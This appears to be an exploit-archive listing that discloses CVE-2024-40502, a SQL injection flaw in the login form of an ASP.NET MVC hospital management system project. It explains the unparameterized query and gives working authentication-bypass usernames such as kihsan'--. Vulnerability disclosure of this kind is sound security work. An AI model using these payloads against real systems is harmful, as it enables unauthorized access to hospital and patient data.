Share
## https://sploitus.com/exploit?id=PACKETSTORM:179583
# Exploit Title: Hospital Management System Project in ASP.Net MVC - SQL  
Injection / Authentication Bypass  
# Date: 07/16/2024  
# Exploit Author: 0xMykull  
# Vendor Hompage:  
https://itsourcecode.com/free-projects/asp/hospital-management-system-project-in-asp-net-mvc-with-source-code/  
# Software Link:  
https://itsourcecode.com/free-projects/asp/hospital-management-system-project-in-asp-net-mvc-with-source-code/  
# Version: 1  
# CVE: CVE-2024-40502  
  
Description:  
An SQL injection vulnerability has been discovered in the btn_login_b_Click  
function of the affected web application. The vulnerability exists due to  
the improper sanitization of user-supplied input in the login form.  
Specifically, the txt_login_username.Text and txt_login_pass.Text fields  
are concatenated directly into an SQL query string without proper  
parameterization or escaping.  
  
Endpoint: https://localhost:44306/Users/Loginpage.aspx  
  
Bypass Payloads:  
  
(default user)  
Username: kihsan'--  
password: <anything>  
  
Username: <anyvaliduser>'--  
password: <anything>